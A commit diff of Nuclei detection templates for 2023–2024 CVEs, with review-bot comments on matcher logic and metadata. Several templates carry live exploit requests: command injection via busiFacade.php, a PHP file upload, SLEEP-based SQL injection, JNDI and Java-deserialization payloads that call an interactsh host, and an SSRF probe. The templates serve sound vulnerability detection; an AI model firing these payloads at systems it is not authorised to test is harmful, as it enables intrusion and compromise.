Path Traversal: '\..\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.
impact: |
Successful exploitation could be lead to disclose of sensitive information such as SSH Keys or Internal configurations.
remediation: |
To fix this vulnerability, it is important to update the mlflow package to the latest version 2.10.0.
reference:
- https://huntr.com/bounties/11209efb-0f84-482f-add0-587ea6b7e850/
- https://nvd.nist.gov/vuln/detail/CVE-2023-6909
- https://github.com/mlflow/mlflow/commit/1da75dfcecd4d169e34809ade55748384e8af6c1
impact: |
Successful exploitation could be lead to disclose of sensitive information such as SSH Keys or Internal configurations.
remediation: |
To fix this vulnerability, it is important to update the mlflow package to the latest version 2.10.0.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
cvss-score: 9.3
cve-id: CVE-2023-6909
cwe-id: CWE-29
metadata:
max-request: 5
verified: true
vendor: lfprojects
product: mlflow
shodan-query: http.title:"mlflow"
shodan-query: "http.title:\"mlflow\""
tags: cve,cve2023,mlflow,lfi
http:
@ -90,4 +91,4 @@ http:
json:
- '.run.info.run_id'
internal: true
# digest: 4a0a00473045022057cab29fe3d00006c6db44ac420a34cecdad60ef71ae6159d9d1870d61d97420022100cd6d7114a977b54c1190e1a9a7002626d05b41874dccf1e9e5d38cacc7082c6d:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100dc4c33652fcf1a1d0dc29690ac81838de82d0c439cc405cb3b0296d4e10cb855022100b3a49f754395ee217ea12cc561be556cc6c3a8da3facee851d5f37fdbab72d61:922c64590222798bb761d5b6d8e72950


@ -0,0 +1,52 @@
id: CVE-2024-0305
info:
name: Ncast busiFacade - Remote Command Execution
author: BMCel
severity: high
description: |
The Ncast Yingshi high-definition intelligent recording and playback system is a newly developed audio and video recording and playback system. The system has RCE vulnerabilities in versions 2017 and earlier.
impact: |
Allows remote attackers to execute arbitrary code on the affected system.
reference:
- https://cxsecurity.com/cveshow/CVE-2024-0305
- https://nvd.nist.gov/vuln/detail/CVE-2024-0305
- https://vuldb.com/?id.249872
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-0305
epss-score: 0.00064
epss-percentile: 0.2597
cpe: cpe:2.3:a:ncast_project:ncast:*:*:*:*:*:*:*:*
metadata:
max-request: 1
verified: true
vendor: ncast_project
product: ncast
fofa-query: app="Ncast-产品" && title=="高清智能录播系统"
zoomeye-query: title:"高清智能录播系统"
tags: cve,cve2024,ncast,rce
http:
- raw:
- |
POST /classes/common/busiFacade.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
{"name":"ping","serviceName":"SysManager","userTransaction":false,"param":["ping 127.0.0.1 | id"]}
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"
- "#str"
condition: and
- type: status
status:
- 200
# digest: 4a0a0047304502207fea590b5f6bf722200ca68b8832b7c0d3a272c55c2c93cc238fef99772514d0022100b0ca7e5f0234813a63935fa5767fe9d688e5e741e2cd658b5cb02f79d241a220:922c64590222798bb761d5b6d8e72950
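Review bot: The regex `uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)` only matches account names made of digits and lowercase letters because the character class lacks `-` and `_`, so output such as `uid=33(www-data)` never matches and a vulnerable host running the service under such a user is reported clean; `uid=\d+\([^)]+\)\s+gid=\d+\([^)]+\)` matches any `id` output. The `Content-Type: application/x-www-form-urlencoded` header paired with a JSON body is presumably what the server expects, but a one-line comment saying so would stop a later clean-up from "correcting" it. `classification` has no `cwe-id` although this is a command injection (`cwe-id: CWE-78`, as the Hikvision template in this commit uses).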


@ -0,0 +1,70 @@
id: CVE-2024-0713
info:
name: Monitorr Services Configuration - Arbitrary File Upload
author: DhiyaneshDK
severity: high
description: |
A vulnerability was found in Monitorr 1.7.6m. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /assets/php/upload.php of the component Services Configuration. The manipulation of the argument fileToUpload leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251539. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
reference:
- https://github.com/Tropinene/Yscanner
- https://github.com/fkie-cad/nvd-json-data-feeds
- https://nvd.nist.gov/vuln/detail/CVE-2024-0713
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2024-0713
cwe-id: CWE-434
cpe: cpe:2.3:a:monitorr:monitorr:1.7.6m:*:*:*:*:*:*:*
epss-score: 0.00061
epss-percentile: 0.2356
metadata:
vendor: monitorr
product: monitorr
verified: true
fofa-query: "icon_hash=\"-211006074\""
max-request: 2
tags: cve,cve2024,file-upload,intrusive,monitorr
variables:
file: "{{to_lower(rand_text_alpha(5))}}"
flow: http(1) && http(2)
http:
- raw:
- |
POST /assets/php/upload.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryaquxwjsn
------WebKitFormBoundaryaquxwjsn
Content-Disposition: form-data; name="fileToUpload"; filename="{{file}}.php"
Content-Type: image/jpeg
{{base64_decode('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')}}
------WebKitFormBoundaryaquxwjsn--
matchers:
- type: word
part: body
internal: true
words:
- "has been uploaded to:"
- raw:
- |
GET /assets/data/usrimg/{{file}}.php HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "atfersotg"
- type: status
status:
- 200
# digest: 490a0046304402201b9bb4536c3d56e915516c2b0156629ce6f3689a312eddd8d0694b86aa144e1902203d8dccbcbba044b30e6fff72ceb7f66bf40a9bf6f3130c3f3b11b0ec3c30a863:922c64590222798bb761d5b6d8e72950
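Review bot: The upload leaves `/assets/data/usrimg/{{file}}.php` on every confirmed host and nothing removes it; the `intrusive` tag signals that to operators, but `description` or `remediation` should state that a file is left behind so responders can clean it up. The base64 payload is shown redacted on this page, so its content cannot be reviewed here; a comment naming the marker string the payload prints (`atfersotg`) would make the second-request matcher self-explanatory. `reference` cites two GitHub repositories and NVD but not the vuldb entry `VDB-251539` that the description itself names.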


@ -0,0 +1,35 @@
id: CVE-2024-1021
info:
name: Rebuild <= 3.5.5 - Server-Side Request Forgery
author: BMCel
severity: medium
description: |
There is a security vulnerability in Rebuild 3.5.5, which is due to a server-side request forgery vulnerability in the URL parameter of the readRawText function of the HTTP Request Handler component.
reference:
- https://github.com/getrebuild/rebuild
- https://nvd.nist.gov/vuln/detail/CVE-2024-1021
impact: |
Successful exploitation of this vulnerability can result in unauthorized access to sensitive internal resources.
remediation: |
Apply the latest security patches or updates provided by Rebuild to fix this vulnerability.
metadata:
max-request: 2
verified: true
fofa-query: "icon_hash=\"871154672\""
tags: cve2024,cve,rebuild,ssrf
http:
- method: GET
path:
- "{{BaseURL}}"
- "{{BaseURL}}/filex/read-raw?url=http://oast.me&cut=1"
matchers:
- type: dsl
dsl:
- 'contains(body_2, "<h1> Interactsh Server </h1>")'
- '!contains(body_1, "<h1> Interactsh Server </h1>")'
- 'status_code_2 == 200'
condition: and
# digest: 4a0a004730450220491492872c6924a820f6183de45c341dbc8838eec5bd79f241a7a8e007817a4d022100bcf486a787a7ac18c43f5a856e8edf8c68546b59012e7c096bbc48085b3ce175:922c64590222798bb761d5b6d8e72950
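Review bot: The SSRF probe hard-codes `url=http://oast.me` and matches on that public server's `<h1> Interactsh Server </h1>` banner, so the check depends on a third-party host's response staying unchanged and on the target having outbound Internet access, and it gives no signal for users running their own interactsh server. Using `url={{interactsh-url}}` with a matcher on `interactsh_protocol` (as the Hikvision and IBM templates in this commit do) makes the verdict come from the callback rather than from page content. `info` also has no `classification` block (`cve-id: CVE-2024-1021`, `cwe-id: CWE-918`).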


@ -6,14 +6,14 @@ info:
severity: high
description: |
WordPress HTML5 Video Player plugin is vulnerable to SQL injection. An unauthenticated attacker can exploit this vulnerability to perform SQL injection attacks.
impact: |
Successful exploitation of this vulnerability could allow an attacker to perform SQL injection attacks, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site.
remediation: |
Vendor did not acknowledge vulnerability but the issue seems to have been fixed in version 2.5.25.
reference:
- https://www.tenable.com/security/research/tra-2024-02
- https://wordpress.org/plugins/html5-video-player
- https://nvd.nist.gov/view/vuln/detail?vulnId=CVE-2024-1061
impact: |
Successful exploitation of this vulnerability could allow an attacker to perform SQL injection attacks, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site.
remediation: |
Vendor did not acknowledge vulnerability but the issue seems to have been fixed in version 2.5.25.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
@ -21,7 +21,8 @@ info:
cwe-id: CWE-89
metadata:
verified: true
fofa-query: '"wordpress" && body="html5-video-player"'
fofa-query: "\"wordpress\" && body=\"html5-video-player\""
max-request: 1
tags: cve,cve2024,wp,wordpress,wp-plugin,sqli,html5-video-player
http:
@ -36,4 +37,4 @@ http:
- 'contains(header, "application/json")'
- 'contains_all(body, "created_at", "video_id")'
condition: and
# digest: 4b0a0048304602210082f5c18e0ac8422e532f5581f775dfd9a57d7c059cf6f41622d7a00306bfa3c6022100d0500ab738261efc3de306be7f8149c4a2f98b4c1560c26fe3617520ce9dd6e9:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100fa33c5d3e6fdd93832d18b7feaeceaab7dc13294ca6117b62c0cf322a734e7d3022100bec7347a690ebaf2785ae5b325485392dbdb16005fd15b862aca9a8930646034:922c64590222798bb761d5b6d8e72950


@ -0,0 +1,57 @@
id: CVE-2024-1071
info:
name: WordPress Ultimate Member 2.1.3 - 2.8.2 SQL Injection
author: DhiyaneshDK,iamnooob
severity: critical
description: |
The Ultimate Member - User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin plugin for WordPress is vulnerable to SQL Injection via the sorting parameter in versions 2.1.3 to 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
remediation: Fixed in 2.8.3
reference:
- https://www.wordfence.com/blog/2024/02/2063-bounty-awarded-for-unauthenticated-sql-injection-vulnerability-patched-in-ultimate-member-wordpress-plugin/
- https://securityonline.info/cve-2024-1071-wordpress-ultimate-member-plugin-under-active-attack/
classification:
cve-id: CVE-2024-1071
cwe-id: CWE-89
metadata:
verified: true
max-request: 2
framework: wordpress
publicwww-query: "/wp-content/plugins/ultimate-member/"
zoomeye-query: app:"WordPress Ultimate Member Plugin"
fofa-query: body="/wp-content/plugins/ultimate-member"
tags: cve,cve2024,ultimate-member,wpscan,wordpress,wp-plugin
http:
- raw:
- |
GET /?p=1 HTTP/1.1
Host: {{Hostname}}
- |
@timeout: 10s
POST /wp-admin/admin-ajax.php?action=um_get_members HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
directory_id=b9238&sorting=user_login,SLEEP(5)&nonce={{nonce}}
host-redirects: true
matchers:
- type: dsl
dsl:
- 'duration_2>=5'
- 'status_code_2 == 200'
- 'contains_all(body_2, "current_page", "total_pages")'
condition: and
extractors:
- type: regex
name: nonce
part: body
group: 1
regex:
- '"nonce":"([0-9a-z]+)"'
internal: true
# digest: 4b0a00483046022100cbbf2eef879ba4fd92a1ea6d44bcd473dbc968afabbde5391d5969feba1bc4c7022100eb9710892e9d92fa4d14b16004b74b743d42abe45900eeef50caf239ea91aaea:922c64590222798bb761d5b6d8e72950
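Review bot: The nonce extractor runs only on `GET /?p=1`, so on a site where post 1 is absent or that page does not embed the Ultimate Member directory, `{{nonce}}` is sent empty and request 2 is answered with an error rather than the delay; a note in `description` that the template assumes a member directory is rendered on `/?p=1`, or a second extractor source, would help. `duration_2>=5` is a single-sample timing check; `duration_1` is available from the first request and a baseline comparison would reduce false positives on slow hosts. `tags` carries `wpscan` but no wpscan reference is listed.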


@ -0,0 +1,51 @@
id: CVE-2024-1208
info:
name: LearnDash LMS < 4.10.3 - Sensitive Information Exposure
author: ritikchaddha
severity: medium
description: |
The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.2 via API. This makes it possible for unauthenticated attackers to obtain access to quiz questions.
remediation: Fixed in 4.10.3
reference:
- https://github.com/karlemilnikka/CVE-2024-1208-and-CVE-2024-1210
- https://nvd.nist.gov/vuln/detail/CVE-2024-1208
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2024-1208
cpe: cpe:2.3:a:learndash:learndash:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
verified: true
vendor: learndash
product: learndash
framework: wordpress
googledork-query: inurl:"/wp-content/plugins/sfwd-lms"
publicwww-query: "/wp-content/plugins/sfwd-lms"
tags: cve,cve2024,wp,wp-plugin,wordpress,exposure,learndash
http:
- method: GET
path:
- "{{BaseURL}}/wp-json/wp/v2/sfwd-question"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"id":'
- '"question_type":'
- '"points_total":'
condition: and
- type: word
part: header
words:
- 'application/json'
- type: status
status:
- 200
# digest: 490a0046304402203916aaf1a8ee1aac0dd4cf38919e9f2e19085f8ccbbed45a47c932c1b491fb1302207bed484d250b4815723b4f03051d6f9f02504d362be0b2f60b4c99d8e8ff2ed3:922c64590222798bb761d5b6d8e72950


@ -0,0 +1,54 @@
id: CVE-2024-1209
info:
name: LearnDash LMS < 4.10.2 - Sensitive Information Exposure via assignments
author: ritikchaddha
severity: medium
description: |
The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via direct file access due to insufficient protection of uploaded assignments. This makes it possible for unauthenticated attackers to obtain those uploads.
remediation: Fixed in 4.10.2
reference:
- https://wpscan.com/vulnerability/f813a21d-7a6a-4ff4-a43c-3e2991a23c7f/
- https://github.com/karlemilnikka/CVE-2024-1209
- https://nvd.nist.gov/vuln/detail/CVE-2024-1209
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2024-1209
cpe: cpe:2.3:a:learndash:learndash:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
verified: true
vendor: learndash
product: learndash
framework: wordpress
googledork-query: inurl:"/wp-content/plugins/sfwd-lms"
publicwww-query: "/wp-content/plugins/sfwd-lms"
tags: cve,cve2024,wp,wp-plugin,wordpress,exposure,learndash
http:
- method: GET
path:
- "{{BaseURL}}/wp-json/wp/v2/sfwd-assignment"
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"id":'
- 'slug":"assignment'
- '.pdf"'
condition: and
- type: word
part: header
words:
- 'application/json'
- type: status
status:
- 200
# digest: 4a0a00473045022033bf2ad75dd487b69924c9295b5366eb34cca9066811d2354a8a4e034a2e6089022100f1f2ee39c0db1395ace5d071d86ed18c10d824d16cc00024087e0b9bb1eb8a37:922c64590222798bb761d5b6d8e72950
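Review bot: The body matcher requires the literal `.pdf"`, so an instance whose exposed assignments are non-PDF uploads satisfies `"id":` and `slug":"assignment` but fails the `and` and is reported clean; if LearnDash accepts other assignment file types, matching on the assignment object's file-URL key rather than the extension would be more robust — I cannot confirm the response schema from here. A comment above the matcher stating why `.pdf"` was chosen would at least make the assumption visible.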


@ -0,0 +1,52 @@
id: CVE-2024-1210
info:
name: LearnDash LMS < 4.10.2 - Sensitive Information Exposure
author: ritikchaddha
severity: medium
description: |
The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via API. This makes it possible for unauthenticated attackers to obtain access to quizzes.
remediation: Fixed in 4.10.2
reference:
- https://wpscan.com/vulnerability/f4b12179-3112-465a-97e1-314721f7fe3d/
- https://github.com/karlemilnikka/CVE-2024-1208-and-CVE-2024-1210
- https://nvd.nist.gov/vuln/detail/CVE-2024-1210
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2024-1210
cpe: cpe:2.3:a:learndash:learndash:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
verified: true
vendor: learndash
product: learndash
framework: wordpress
googledork-query: inurl:"/wp-content/plugins/sfwd-lms"
publicwww-query: "/wp-content/plugins/sfwd-lms"
tags: cve,cve2024,wp,wp-plugin,wordpress,exposure,learndash
http:
- method: GET
path:
- "{{BaseURL}}/wp-json/ldlms/v1/sfwd-quiz"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"id":'
- '"quiz_materials":'
- 'quizzes'
condition: and
- type: word
part: header
words:
- 'application/json'
- type: status
status:
- 200
# digest: 490a00463044022079f0e028ee4fd33b5e897e0550a707be3dbe291e8085b9d175297108e9c8858102202a9344a25a6ec5fa1fc025e439a8887f6cc9c9ac50b6c199f1fa27e4cc948855:922c64590222798bb761d5b6d8e72950


@ -0,0 +1,56 @@
id: CVE-2024-1709
info:
name: ConnectWise ScreenConnect 23.9.7 - Authentication Bypass
author: johnk3r
severity: critical
description: |
ConnectWise ScreenConnect 23.9.7 and prior are affected by an Authentication Bypass Using an Alternate Path or Channel vulnerability, which may allow an attacker direct access to confidential information or critical systems.
reference:
- https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass
- https://github.com/watchtowrlabs/connectwise-screenconnect_auth-bypass-add-user-poc
- https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8
- https://nvd.nist.gov/vuln/detail/CVE-2024-1709
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cve-id: CVE-2024-1709
cwe-id: CWE-288
metadata:
verified: true
max-request: 1
vendor: connectwise
product: screenconnect
shodan-query: http.favicon.hash:-82958153
fofa-query: app="ScreenConnect-Remote-Support-Software"
zoomeye-query: app:"ScreenConnect Remote Management Software"
hunter-query: app.name="ConnectWise ScreenConnect software"
tags: cve,cve2024,screenconnect,connectwise,auth-bypass,kev
variables:
string: "{{rand_text_alpha(10)}}"
http:
- method: GET
path:
- "{{BaseURL}}/SetupWizard.aspx/{{string}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "SetupWizardPage"
- "ContentPanel SetupWizard"
condition: and
- type: status
status:
- 200
extractors:
- type: kval
part: header
kval:
- Server
# digest: 4a0a00473045022100a74505da69fc5fb96361adc56f169fe3a2e25cf85bc6df3b254da6430f8f723f02200dd625105f73d1d23ede46af0dbee84cce441acdb5c91079411b20c841a8bf23:922c64590222798bb761d5b6d8e72950
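Review bot: `info` has no `remediation` key although the fixed build is named in the bulletin URL it cites (`connectwise-screenconnect-23.9.8`); `remediation: Upgrade to ScreenConnect 23.9.8 or later` would align it with the other templates in this commit. The check only requests `/SetupWizard.aspx/{{string}}` and matches the wizard page, so it does not create an account; saying so in `description` helps responders reading scanner logs, and since the template is tagged `kev`, a note that a matched host should be checked for accounts created by prior exploitation would be useful.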


@ -6,25 +6,26 @@ info:
severity: medium
description: |
A log injection vulnerability was identified in pyload. This vulnerability allows any unauthenticated actor to inject arbitrary messages into the logs gathered by pyload.
impact: |
Forged or otherwise, corrupted log files can be used to cover an attacker's tracks or even to implicate another party in the commission of a malicious act.
reference:
- https://github.com/advisories/GHSA-ghmw-rwh8-6qmr
- https://nvd.nist.gov/vuln/detail/CVE-2024-21645
- https://github.com/fkie-cad/nvd-json-data-feeds
impact: |
Forged or otherwise, corrupted log files can be used to cover an attacker's tracks or even to implicate another party in the commission of a malicious act.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
cvss-score: 5.3
cve-id: CVE-2024-21645
cwe-id: CWE-74
cpe: cpe:2.3:a:pyload:pyload:*:*:*:*:*:*:*:*
epss-score: 0.00046
epss-percentile: 0.13723
cpe: cpe:2.3:a:pyload:pyload:*:*:*:*:*:*:*:*
metadata:
verified: true
vendor: pyload
product: pyload
shodan-query: title:"pyload"
shodan-query: "title:\"pyload\""
max-request: 2
tags: cve,cve2024,pyload,authenticated,injection
variables:
@ -59,4 +60,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a00473045022100e4681bad6b75b2295f0256953d1d293a42d79e61b3607a307caf6cc5b040ccbb02201912657be888fe3a799ada24aaa1de05d3667731e84900bedb0e556a187f2dfc:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402203cbf3ae7a02a2a68165345f0bd855eb6ab923669c8d2aa78f2922e0baee747f702201104ac76e942d9f3bff9d59b6e4227e4d59ff27e41aeca67e1138508b572d5b9:922c64590222798bb761d5b6d8e72950


@ -18,8 +18,9 @@ info:
cpe: cpe:2.3:a:ivanti:connect_secure:9.0:-:*:*:*:*:*:*
metadata:
vendor: ivanti
product: connect_secure
product: "connect_secure"
shodan-query: "html:\"welcome.cgi?p=logo\""
max-request: 1
tags: cve,cve2024,kev,ssrf,ivanti
http:
@ -43,4 +44,4 @@ http:
- '/dana-na/'
- 'WriteCSS'
condition: and
# digest: 4a0a00473045022100fefc6637185b28b4af8b503bdb7b89401fc591c34cb6082b20322ac0f1ad67c8022027e634cbc733ad699766de6d8eb8f22b6368d0b663cd28cbd957eaaf37f51838:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022031bba2e0349c9af3102196e00e85678ddbb51ba287e5d624558a50a3bbaa6be20221008a362ec4ef64ece7ab22636b902c72df49e1f72c519731e5c2eb22dec2db5c76:922c64590222798bb761d5b6d8e72950


@ -0,0 +1,39 @@
id: CVE-2024-22319
info:
name: IBM Operational Decision Manager - JNDI Injection
author: DhiyaneshDK
severity: critical
description: |
IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1 is susceptible to remote code execution attack via JNDI injection when passing an unchecked argument to a certain API. IBM X-Force ID: 279145.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-22319
cwe-id: CWE-74
epss-score: 0.00283
epss-percentile: 0.67752
cpe: cpe:2.3:a:ibm:operational_decision_manager:8.10.3:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: ibm
product: operational_decision_manager
shodan-query: html:"IBM ODM"
fofa-query: title="IBM ODM"
tags: cve,cve2024,ibm,odm,decision-manager,jndi,jsf,rce
http:
- method: GET
path:
- "{{BaseURL}}/decisioncenter-api/v1/about?datasource=ldap://{{interactsh-url}}"
matchers:
- type: dsl
dsl:
- contains(interactsh_protocol, "dns")
- 'contains(header, "application/json")'
- 'contains(body, "patchLevel\":")'
- 'status_code == 200'
condition: and
# digest: 4a0a00473045022100bd482d70c6c93cf274bdde0ad6aefa255e1e20edcff44034afb21a45d3fc96e802204f0c9289a94160d4606e60e859ca554ead9d6b21a8441a9d9bf065ec7f9f3cd4:922c64590222798bb761d5b6d8e72950
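Review bot: `info` has no `reference` list, unlike every other new template in this commit; at minimum the NVD entry for CVE-2024-22319 should be cited so reviewers can check the affected-version list against the description. The first dsl entry `contains(interactsh_protocol, "dns")` is unquoted while the three below it are single-quoted; quoting all four the same way (`- 'contains(interactsh_protocol, "dns")'`) avoids YAML treating the embedded `"` differently per line. `remediation` is also absent.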


@ -0,0 +1,49 @@
id: CVE-2024-22320
info:
name: IBM Operational Decision Manager - Java Deserialization
author: DhiyaneshDK
severity: high
description: |
IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1 could allow a remote authenticated attacker to execute arbitrary code on the system, caused by an unsafe deserialization. By sending specially crafted request, an attacker could exploit this vulnerability to execute arbitrary code in the context of SYSTEM. IBM X-Force ID: 279146.
reference:
- https://labs.watchtowr.com/double-k-o-rce-in-ibm-operation-decision-manager/
- https://nvd.nist.gov/vuln/detail/CVE-2024-22320
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2024-22320
cwe-id: CWE-502
epss-score: 0.00283
epss-percentile: 0.67773
cpe: cpe:2.3:a:ibm:operational_decision_manager:8.10.3:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: ibm
product: operational_decision_manager
shodan-query: html:"IBM ODM"
fofa-query: title="IBM ODM"
tags: cve,cve2024,ibm,odm,decision-manager,deserialization,jsf,rce
http:
- method: GET
path:
- '{{BaseURL}}/res/login.jsf?javax.faces.ViewState={{generate_java_gadget("dns", "http://{{interactsh-url}}", "base64")}}'
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
- type: word
part: body
words:
- 'javax.servlet.ServletException'
- type: status
status:
- 500
# digest: 4a0a0047304502210098cb051d3eaa91348194c7ecd090833e583697c9d77cd778763d770664584db60220693f3bc37f42c69a6e2c7f3c052d0af3e6f5b6dabf1c36d80c23967672fc642b:922c64590222798bb761d5b6d8e72950
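Review bot: The matcher demands `status: 500` and the literal `javax.servlet.ServletException` in the body in addition to the interactsh DNS hit, so a deployment with a custom error page suppresses the verdict although the out-of-band callback alone already shows the gadget was processed; consider keeping only the `interactsh_protocol` matcher as mandatory. The description and the `PR:L` vector speak of a "remote authenticated attacker", yet the request targets `/res/login.jsf` without any session; if the check is genuinely pre-authentication, a sentence in `description` saying so avoids confusion about severity.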
